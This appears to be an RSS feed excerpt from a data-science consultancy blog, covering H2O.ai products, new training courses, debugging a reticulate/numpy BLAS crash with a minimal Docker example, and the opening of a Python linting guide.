&lt;p&gt;&lt;a href="https://www.h2o.ai/products/h2o-wave/" rel="external"&gt;H2O Wave&lt;/a&gt;: H2O Wave is an open-source Python framework for designing and deploying applications with interactive user interfaces. It can be used to make &lt;a href="https://wave.h2o.ai/docs/getting-started" rel="external"&gt;simple applications&lt;/a&gt; such as to-do lists, or more complex applications where you can deploy your machine learning models that have been developed using H2O or H2O Driverless AI. If you have a spare hour and want to see how to get started with H2O Wave here is a useful &lt;a href="https://www.youtube.com/watch?v=alYWqXv8Sdg" rel="external"&gt;tutorial&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Example of a web application made by H2O Wave" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/introduction-to-h2o/h2owave.png" width="1814"&gt;
&lt;em&gt;Image taken from &lt;a href="https://wave.h2o.ai/" rel="external"&gt;H2O Wave homepage&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.h2o.ai/products/h2o-sparkling-water/" rel="external"&gt;Sparkling Water&lt;/a&gt;: If you are familiar with Apache Spark (the open source distributed, cluster computing framework used for big data), Sparkling Water is a tool which will allow you to implement advanced machine learning algorithms from H2O within your Spark implementations.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="propriety-tools"&gt;Proprietary tools&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/ai-cloud/managed/" rel="external"&gt;H2O AI Cloud&lt;/a&gt;: If you are in need of cloud infrastructure, H2O.ai can now provide this with H2O AI Cloud. You can choose between a &lt;a href="https://www.h2o.ai/ai-cloud/managed/" rel="external"&gt;fully managed&lt;/a&gt; cloud infrastructure if you do not want to deal with setting up infrastructure, scaling, or software updates, or a &lt;a href="https://www.h2o.ai/ai-cloud/hybrid/" rel="external"&gt;hybrid&lt;/a&gt; cloud infrastructure if you want a little more control over your cloud environment.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/products/h2o-driverless-ai/" rel="external"&gt;H2O Driverless AI&lt;/a&gt;: Like H2O, this tool also offers automatic machine learning but this tool takes it a few steps further. As well as trying different machine learning algorithms (and ensembles of the available algorithms), this tool will also perform automatic feature engineering, produce data visualisations and post-training diagnostic plots, and give performance metrics for each model; you can also easily deploy models that have been created and create model documentation. The tool is designed for both data scientists and non-data scientists. H2O.ai provide a user-friendly interface for Driverless AI (which you can see below) so non-data scientists can easily load data, visualise the data, use the automatic machine learning algorithms to develop a model and evaluate the final result. Depending on a few metrics such as interpretability, time, and accuracy, different models will be used. For more technical users, you can control a large variety of parameters including oversampling techniques, particular parameter values to try in neural networks, the types of models to try, whether to perform early stopping and much, much more. You can use Driverless AI on tabular data, time-series data, text data and image data to perform tasks such as prediction/classification tasks, forecasting, natural language processing and image classification. A full list of the different algorithms currently available can be seen &lt;a href="https://docs.h2o.ai/driverless-ai/latest-stable/docs/userguide/supported-algorithms.html" rel="external"&gt;here&lt;/a&gt;. If you want to add your own algorithms into the mix, such as custom neural networks, Driverless AI allows you to add your own models (for neural network fans both TensorFlow and PyTorch models can be added) as &amp;lsquo;custom recipes&amp;rsquo; to be used when trialling different algorithms.
If you are interested in seeing how this tool is used here is a quick &lt;a href="https://www.youtube.com/watch?v=wcyMBRRLmqs" rel="external"&gt;demonstration&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Example of Driverless AI user interface" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/introduction-to-h2o/driverlessai.png" width="1528"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/resources/product-brief/h2o-in-autodoc/" rel="external"&gt;H2O AutoDoc&lt;/a&gt;: AutoDoc allows you to create automatic model documentation for your models created in either H2O or Driverless AI (this feature is integrated into Driverless AI). You can also use this tool on any model you create using the Python library scikit-learn. The documentation can be personalised to include the output that you think is most important, e.g. a confusion matrix, model performance metrics, etc. The document can be written to either a Microsoft Word file or a Markdown file.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/resources/product-brief/h2o-mlops/" rel="external"&gt;H2O MLOps&lt;/a&gt;: If you are looking at putting your machine learning models into production, this is where MLOps (machine learning operations) can help. H2O MLOps can be used to deploy models that you have created in both H2O and H2O Driverless AI and allows you to easily maintain them once they are in production. The tool uses &lt;a href="https://kubernetes.io/" rel="external"&gt;Kubernetes&lt;/a&gt; for easy deployment, scaling and management of your production models and allows you to run diagnostics and update models without ever needing ‘down-time’.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/resources/product-brief/h2o-enterprise-puddle/" rel="external"&gt;H2O Enterprise Puddle&lt;/a&gt;: Enterprise Puddle is designed to help you easily create and manage H2O cloud instances. This tool is aimed at people who work within IT maintaining environments, permissions, data access, etc. rather than data scientists.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in trying out any of the above proprietary tools (excluding Enterprise Puddle), H2O.ai are offering a &lt;a href="https://www.h2o.ai/freetrial/" rel="external"&gt;90-day free trial&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="technical-features"&gt;Technical features&lt;/h2&gt;
&lt;p&gt;H2O.ai products are built for distributed, in-memory machine learning. They achieve this by distributing data across an H2O cluster and storing it in memory in a compressed format, which allows for parallelisation. H2O.ai use Java as their main coding language, and REST APIs allow you to work with H2O products from languages such as R and Python. If you already know R or Python, you can therefore use H2O, H2O Wave, Sparkling Water and Driverless AI without needing to learn another coding language!&lt;/p&gt;
&lt;p&gt;Another feature of H2O and H2O Driverless AI that you might find useful is that any model created with either tool can be exported for later use. In H2O, a model can be exported as a hierarchical data format (HDF5) file, a MOJO (model object, optimized) or a POJO (plain old Java object). If you want to learn more about these different formats, here is a useful &lt;a href="https://docs.h2o.ai/h2o/latest-stable/h2o-docs/productionizing.html#about-pojo-mojo" rel="external"&gt;link&lt;/a&gt;. In H2O Driverless AI you can export &amp;lsquo;Scoring Pipelines&amp;rsquo;. These can be used to deploy the models that you have developed within Driverless AI for production. They can be exported as either Python Scoring Pipelines or MOJO Scoring Pipelines. Within the Python Scoring Pipeline an example Python script is added to show you how to use the pipeline in practice. If you would like to know more about exporting your Scoring Pipelines from Driverless AI take a look &lt;a href="https://docs.h2o.ai/driverless-ai/latest-stable/docs/userguide/python-mojo-pipelines.html" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Now that you have read about H2O.ai and the tools that they provide, I hope that you have a better idea of which H2O.ai tools you could use for your machine learning projects. H2O.ai have created a set of tools which knit together nicely when used with each other. If you want to see how these tools are used in production, H2O.ai have a full section on their &lt;a href="https://www.h2o.ai/solutions/" rel="external"&gt;website&lt;/a&gt; dedicated to showing use cases for their tools.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/introduction-to-h2o/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>New training courses</title><link>https://www.jumpingrivers.com/blog/june-training-update/</link><pubDate>Tue, 07 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/june-training-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/june-training-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/june-training-update/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The trainers here at Jumping Rivers have been busy developing a host of new courses for your programming pleasure! We have recently developed several new courses, which are now available to view on our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course list&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As well as R and Python, our new courses focus on two new tools: &lt;a href="https://h2o.ai/" rel="external"&gt;H2O.ai&lt;/a&gt; and &lt;a href="https://www.tableau.com/" rel="external"&gt;Tableau&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-june-training-overview"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="h2oai"&gt;H2O.ai&lt;/h3&gt;
&lt;p&gt;H2O.ai develop easy to use machine learning and AI tools. H2O Driverless AI is a tool which allows you to perform automatic machine learning without having to learn how to code, while H2O Wave allows you to develop real-time interactive web applications, without the need to learn any programming outside Python. Our introductory courses will show you how to use H2O Driverless AI to create, analyse and deploy machine learning models for your data, and how to use H2O Wave to develop an interactive web application to display data.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-driverlessai-machinelearning-automl-automated-machine-learning/" rel="external"&gt;Introduction to H2O Driverless AI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-driverlessai-machinelearning-automl-automated-machine-learning/" rel="external"&gt;Introduction to H2O Driverless AI Python Client&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-driverlessai-machinelearning-automl-automated-machine-learning/" rel="external"&gt;Introduction to H2O Driverless AI R Client&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-wave-web-application-visualisation/" rel="external"&gt;Introduction to H2O Wave&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="tableau"&gt;Tableau&lt;/h3&gt;
&lt;p&gt;Faster and more capable of handling larger datasets than Excel, Tableau is quickly becoming a valuable tool for individuals and organisations who want to leverage their data. It’s more user-friendly and simpler to learn than programming languages, but still allows a high level of customisation. Tableau is more than just a simple data visualisation tool. It also gives people the capability to manipulate multiple data sources, create custom charts, build predictive models, and turn their plots into interactive dashboards and presentations. Introduction to Tableau will help you to get to grips with the basics of summarising and interactively visualising your data, while Data Exploration with Tableau will showcase what Tableau can do beyond basic data visualisation.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-to-tableau/" rel="external"&gt;Introduction to Tableau&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Data Exploration with Tableau&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;p&gt;We also have several new R courses. Text Mining in R will teach you the basics of manipulating and transforming text data as well as how to extract meaning and sentiment in R, using packages such as {stringr} and {tidytext}. In our one-day Tidy Evaluation in R course, we introduce the {rlang} package as a way of passing variables from a data set into a function, and cover environments and function evaluation in R, to help you understand how the tools in {rlang} work under the hood. Object Oriented Programming in R will teach you what OOP is and the different varieties within R, beginning with the popular S3 and S4 OOP frameworks, and finishing with the new {R6} package that is used extensively in Shiny applications.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-text-mining-tidyverse-stringr-tidytext/" rel="external"&gt;Text Mining in R&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/tidy-evaluation-tidyverse-rlang-r/" rel="external"&gt;Tidy Evaluation in R&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/oop-s3-s4-r6-classes/" rel="external"&gt;Object Oriented Programming in R&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;p&gt;Writing code is all well and good, but writing code which is easy to read, simple to maintain, and reproducible is a challenge, especially under pressure. This course will show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-best-practices/" rel="external"&gt;Python Best Practices&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/june-training-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Reproducible Example</title><link>https://www.jumpingrivers.com/blog/creating-reproducible-example-r/</link><pubDate>Tue, 31 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/creating-reproducible-example-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/creating-reproducible-example-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="maintaining-training-materials"&gt;Maintaining training materials&lt;/h2&gt;
&lt;p&gt;Over the last few years, we have increased both the number and types of
training courses we offer. In addition to our usual R courses in {dplyr}
and {shiny}, we also offer
&lt;a href="https://jumpingrivers.com/training/all-courses/" rel="external"&gt;training&lt;/a&gt; on Docker,
Python, Stan, TensorFlow, and others.&lt;/p&gt;
&lt;p&gt;As the number of courses we offer increased, so did the maintenance
burden of our associated training materials (lecture notes, slides,
exercises, and more). To ease this burden, and to assist in ensuring
that our training materials build consistently, we developed an R
package called {jrNotes2}. Amongst other things, this package ensures
that all courses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;have identical “template files”: &lt;code&gt;.gitlab-ci.yml&lt;/code&gt;, &lt;code&gt;.gitignore&lt;/code&gt;,
&lt;code&gt;Makefile&lt;/code&gt;s, &lt;code&gt;index.Rmd&lt;/code&gt;, …;&lt;/li&gt;
&lt;li&gt;have the same directory structure, and&lt;/li&gt;
&lt;li&gt;pass a set of quality-assurance checks.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To make a change to course content, a team member must push their
suggestions to a branch on GitLab. This action launches a CI job, which
runs a Docker container that performs a set of checks. The templated
&lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file ensures that every course undergoes the same build
process and quality-assurance checks. If the content passes these
checks, &lt;em&gt;and&lt;/em&gt; an eligible approver approves the changes, then the
changes are merged into the main branch.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/2022-repex-blog.png" alt="Cartoon showing arrows from Data scientist to GitLab to Docker container to Continuous Integration" style="display: block; margin: auto;" /&gt;
&lt;p&gt;This means course content in a main branch should never fail our checks.
Well, not quite…&lt;/p&gt;
&lt;h2 id="why-we-cant-freeze-all-dependencies"&gt;Why we can’t freeze all dependencies&lt;/h2&gt;
&lt;p&gt;When teaching a course, we want to teach with the &lt;em&gt;exact same&lt;/em&gt; packages
an attendee would get via an &lt;code&gt;install.packages()&lt;/code&gt; or &lt;code&gt;pip install&lt;/code&gt;
command. This means we must always use the &lt;em&gt;latest&lt;/em&gt; versions of packages
available on CRAN and PyPI. However, always using the latest available
packages has its dangers: a change to a package used by a course can
suddenly cause our teaching materials to begin failing our build checks.&lt;/p&gt;
&lt;p&gt;To try and pre-empt package changes breaking our training materials we
use scheduled CI runs. That is, at regular intervals a CI job
automatically runs our tests and checks against a course’s training
materials. If a course’s materials fail these checks, we are notified
via a message in a Slack channel. Around early January, we started
getting notifications about our Introduction to Python course:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/slack.png" alt="Screenshot of slack notification showing the failed pipeline, where failed job is notes-build." style="display: block; margin: auto;" /&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-creating-reproducible-example-r"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-problem"&gt;The problem&lt;/h2&gt;
&lt;p&gt;Unfortunately, the traceback given by the CI wasn’t the most
enlightening:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/segfault.png" alt="segfault traceback screenshot" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Strangely, the course materials&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;built successfully on Colin’s laptop;&lt;/li&gt;
&lt;li&gt;failed to build on Jack’s laptop, and&lt;/li&gt;
&lt;li&gt;failed to build on the CI runner.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As far as we could see, everything appeared &lt;em&gt;roughly&lt;/em&gt; the same on all
three systems, with all three running the same operating system, the
same R version, and using the same package versions.&lt;/p&gt;
&lt;p&gt;Whilst we could reproduce the error in a Docker container, the error was
difficult to debug as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the container used a large number of internal Jumping Rivers R
packages;&lt;/li&gt;
&lt;li&gt;the materials build process involved a set of non-trivial Rmd files,
and&lt;/li&gt;
&lt;li&gt;the error wasn’t encountered until around eight minutes into the
build and test process.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, whilst we had a reproducible example of the error, it was only
reproducible by a Jumping Rivers employee, and it was &lt;em&gt;far&lt;/em&gt; from a
minimal example.&lt;/p&gt;
&lt;h2 id="simplifying-the-problem"&gt;Simplifying the problem&lt;/h2&gt;
&lt;p&gt;To make progress, we had to simplify the Docker container. We asked
ourselves the following questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Can we remove all unnecessary files, such as presentation slides?
Yes.&lt;/li&gt;
&lt;li&gt;Can we simplify the course notes? Yes: we were able to find a single
Python code chunk that caused the issue.&lt;/li&gt;
&lt;li&gt;Can we remove all of our custom Rmd styling? Yes: a simpler Rmd file
with the same chunk gave the same error.&lt;/li&gt;
&lt;li&gt;Can we reproduce the issue without R Markdown? Yes: a simple R
script can reproduce the same error.&lt;/li&gt;
&lt;li&gt;Does the Dockerfile need to be complex? No: we can remove most of
the unnecessary Python, Debian and R related packages.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="a-minimal-reproducible-example"&gt;A minimal reproducible example&lt;/h2&gt;
&lt;p&gt;After all of our simplifications, we arrived at a &lt;em&gt;minimal&lt;/em&gt; reproducible
example with the Dockerfile:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rocker/r-ver:latest&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; apt update &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt install -y python3 python3-dev python3-venv&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; install2.r --error reticulate&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; test.R /root/&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and associated R script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reticulate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;virtualenv_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; envname &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;./venv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; packages &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;matplotlib&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reticulate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_virtualenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;./venv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reticulate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;py_run_string&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;import matplotlib.pyplot as plt; plt.plot([1, 2, 3], [1, 2, 3])&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By simplifying the problem, we were now in a position to ask for help
from others.&lt;/p&gt;
&lt;p&gt;As this appeared to be a bug (it used to work, but now it doesn’t), we
raised &lt;a href="https://github.com/rstudio/reticulate/issues/1133" rel="external"&gt;an issue against the
{reticulate}&lt;/a&gt;
repository.&lt;/p&gt;
&lt;h2 id="a-partial-solution"&gt;A (partial) solution&lt;/h2&gt;
&lt;p&gt;Soon after posting &lt;a href="https://github.com/rstudio/reticulate/issues/1133#issuecomment-1021783041" rel="external"&gt;we received a
response&lt;/a&gt;
from one of the {reticulate} developers. Their response revealed that
matplotlib was nothing but an innocent bystander in our issue, and that
the real culprits were the incompatible BLAS (Basic Linear Algebra
Subprograms) libraries being used by R and numpy!&lt;/p&gt;
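&lt;p&gt;If you hit a similar crash, it can help to check which BLAS libraries have actually been loaded into the process. The following is a minimal sketch rather than the approach taken in the issue thread: it assumes a Linux system (where &lt;code&gt;/proc/self/maps&lt;/code&gt; lists the files mapped into the current process), and the function name &lt;code&gt;find_blas_libraries()&lt;/code&gt; and the list of file-name hints are illustrative choices, not part of any library.&lt;/p&gt;

```python
import os

# Substrings that commonly appear in BLAS/LAPACK shared-library file names.
# This list is an assumption for illustration, not an exhaustive catalogue.
BLAS_HINTS = ("blas", "lapack", "mkl")


def find_blas_libraries(maps_text):
    """Return sorted, de-duplicated library paths that look like BLAS/LAPACK builds."""
    found = set()
    for line in maps_text.splitlines():
        # Each line is: address perms offset device inode [path]
        fields = line.split(None, 5)
        if len(fields) != 6:
            continue  # anonymous mapping with no backing file
        path = fields[5].strip()
        name = os.path.basename(path).lower()
        if ".so" in name and any(hint in name for hint in BLAS_HINTS):
            found.add(path)
    return sorted(found)


if __name__ == "__main__" and os.path.exists("/proc/self/maps"):
    # Linux only: inspect the libraries mapped into this very process.
    with open("/proc/self/maps") as handle:
        for library in find_blas_libraries(handle.read()):
            print(library)
```

&lt;p&gt;Two different paths for the same library family (for example, a system copy and one bundled inside a Python package) would be a hint that R and numpy are not sharing a single BLAS.&lt;/p&gt;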
&lt;p&gt;The suggested solution was to compile the numpy package from source
within Docker. However, compiling numpy at container runtime added
around 3 minutes to the CI checks &lt;em&gt;every time&lt;/em&gt; they ran. As such, we
opted to build the numpy package from source at image &lt;em&gt;build-time&lt;/em&gt;,
effectively caching the package build, and avoiding re-compiling numpy
every time our build tests ran against our training materials.&lt;/p&gt;
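&lt;p&gt;One way to force a source build is pip&amp;rsquo;s &lt;code&gt;--no-binary&lt;/code&gt; option, which skips pre-built wheels for the named package. The sketch below is illustrative rather than the exact commands from our image: the helper name &lt;code&gt;source_install_command()&lt;/code&gt; and the &lt;code&gt;--run&lt;/code&gt; switch are hypothetical, and a compiler toolchain is assumed to be available.&lt;/p&gt;

```python
import subprocess
import sys


def source_install_command(package, python=sys.executable):
    """Build a pip command that compiles `package` locally instead of using a wheel."""
    # "--no-binary PACKAGE" tells pip not to use pre-built wheels for PACKAGE.
    return [python, "-m", "pip", "install", "--no-binary", package, package]


if __name__ == "__main__" and "--run" in sys.argv:
    # Hypothetical switch: only install when asked explicitly,
    # for example from a RUN step while the Docker image is being built.
    subprocess.run(source_install_command("numpy"), check=True)
```

&lt;p&gt;Calling a script like this from a &lt;code&gt;RUN&lt;/code&gt; step in the Dockerfile means the compilation happens once, when the image is built, rather than on every CI run.&lt;/p&gt;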
&lt;p&gt;Although compiling numpy from source did fix our issue, it currently
presents as more of a workaround than a long-term solution. Hopefully, a
future change to the BLAS libraries used by the rocker image series or
numpy, can allow the two to be friends again. Here’s to hoping!&lt;/p&gt;
&lt;h2 id="take-aways"&gt;Take-aways&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Using scheduled CI jobs allowed us to catch this issue early, and
gave us plenty of time to fix it before the next time the course
ran.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Running the checks in CI ensured we had an (internally) reproducible example, as
the CI is based on a Docker container.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In order to get help, it was crucial to simplify the problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Debugging is hard, and it’s okay to ask for help!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/rstudio/reticulate/issues/1133" rel="external"&gt;https://github.com/rstudio/reticulate/issues/1133&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/creating-reproducible-example-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Stylising your Python code: An introduction to linting and formatting</title><link>https://www.jumpingrivers.com/blog/python-linting-guide/</link><pubDate>Thu, 26 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-linting-guide/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-linting-guide/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-linting-guide/code_quality.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://xkcd.com/1513" rel="external"&gt;https://xkcd.com/1513&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Linting is a process for identifying bugs and stylistic errors in your code. The process is carried out by analysis tools called &amp;rsquo;linters&amp;rsquo;, which are widely available for every major programming language. Linters will flag issues and style violations in your code, sort of like a spell checker!&lt;/p&gt;
&lt;p&gt;In addition to linters, there are a wide range of &amp;lsquo;auto-formatters&amp;rsquo; that can also carry out these checks, and even make the necessary changes for you.&lt;/p&gt;
&lt;p&gt;In this post we will provide an introductory overview of popular linters and auto-formatters for Python.&lt;/p&gt;
&lt;h2 id="why-should-i-care"&gt;Why should I care?&lt;/h2&gt;
&lt;p&gt;Put simply, linting helps to ensure that the format and style of your code adheres to the best coding practices. A nice thing about Python is that there is a clearly defined set of guidelines for code formatting and styling which most linters adhere to. These guidelines are laid out in &lt;a href="https://peps.python.org/pep-0008/" rel="external"&gt;PEP8&lt;/a&gt;, which is a Python Enhancement Proposal (PEP) written in 2001 to describe how Python developers can write readable and consistent code.&lt;/p&gt;
&lt;p&gt;Whether or not you intend to share your code, there are lots of reasons why you should care!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Readability&lt;/strong&gt;: It goes without saying that if you plan to share your code with colleagues or make it publicly available, it&amp;rsquo;s got to be readable. Even if you&amp;rsquo;re working on it solo, you will be thankful in the long-run that you took the time to write clear, logical code. This will save a lot of head-scratching when you return to it later!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Debugging&lt;/strong&gt;: A really nice feature of linters is the ability to flag bugs in your code without needing to run it (&lt;em&gt;static analysis&lt;/em&gt;). Plus, readable code is much easier to debug!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
